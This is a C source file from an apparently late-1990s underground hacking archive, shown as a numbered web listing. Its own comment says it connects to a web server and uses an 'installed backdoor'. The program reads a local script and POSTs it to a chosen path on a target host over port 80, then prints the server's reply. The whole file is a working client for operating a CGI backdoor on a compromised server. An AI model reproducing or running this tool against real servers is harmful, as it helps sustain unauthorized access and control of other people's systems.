home *** CD-ROM | disk | FTP | other *** search
/ Underground / Underground CD1.iso / hack / PDFAQ.ZIP / useCGIback.c < prev    next >
Encoding:
C/C++ Source or Header  |  1998-03-08  |  1.6 KB  |  63 lines

  1. // useCGIback.c - by Permssion Denied
  2. // this programs makes connection with WWW server and uses installed
  3. // backdoor
  4.  
  5. #include <stdio.h>
  6. #include <sys/socket.h>
  7. #include <netdb.h>
  8. #include <netinet/in.h>
  9. #include <stdlib.h>
  10. #include <fcntl.h>
  11. #include <sys/stat.h>
  12.  
  13. main (int argc, char **argv)
  14. {
  15.  struct sockaddr_in sin;
  16.  char buf[1000];
  17.  long len = 0, a;
  18.  int f, sock;
  19.  struct hostent *phe;
  20.  
  21.  if(argc != 4) {
  22.   printf("Usage:\n %s <script-name> <host> <location>\n", argv[0]);
  23.   return 1;
  24.  }
  25.  if((f = open(argv[1], O_RDONLY))<0) {
  26.   printf("%s: Bad file name %s\n", argv[0], argv[1]);
  27.   return 1;
  28.  }
  29.  do {
  30.   a = read(f, &buf, 1000);
  31.   len += a;
  32.  } while(a > 0);
  33.  len -= a;
  34.  lseek(f, 0, SEEK_SET);
  35.  printf("Data length: %d\n", len);
  36.  printf("Looking for address of %s: ", argv[2]);
  37.  bzero((char *) &sin, sizeof(sin));
  38.  sin.sin_family = AF_INET;
  39.  sin.sin_port = htons(80);
  40.  if (phe = gethostbyname (argv[2]))
  41.   bcopy(phe -> h_addr, (char *) &sin.sin_addr, phe -> h_length);
  42.   else
  43.   {
  44.    printf("failed\n", argv[0]);
  45.    return 1;
  46.   }
  47.  printf("found\n");
  48.  if ((sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP))<0) {
  49.   printf("%s: Cannot open socket\n", argv[0]);
  50.   return 1;
  51.  }
  52.  if (connect(sock, (struct sockaddr *) &sin, sizeof(sin)) < 0) {
  53.   printf("%s: Cannot connect: %d\n", argv[0], errno);
  54.   return 1;
  55.  }
  56.  printf("Transmiting header: ");
  57.  sprintf(buf, "POST %s HTTP/1.0\nContent-Length: %d\n\n", argv[3], len);
  58.  write(sock, &buf, strlen(buf));
  59.  printf("done\n---\n");
  60.  while((a = read(f, &buf, 1000)) > 0) write(sock, &buf, a);
  61.  close(f);
  62.  while((a = read(sock, &buf, 1000)) > 0) write(fileno(stdout), &buf, a);
  63. }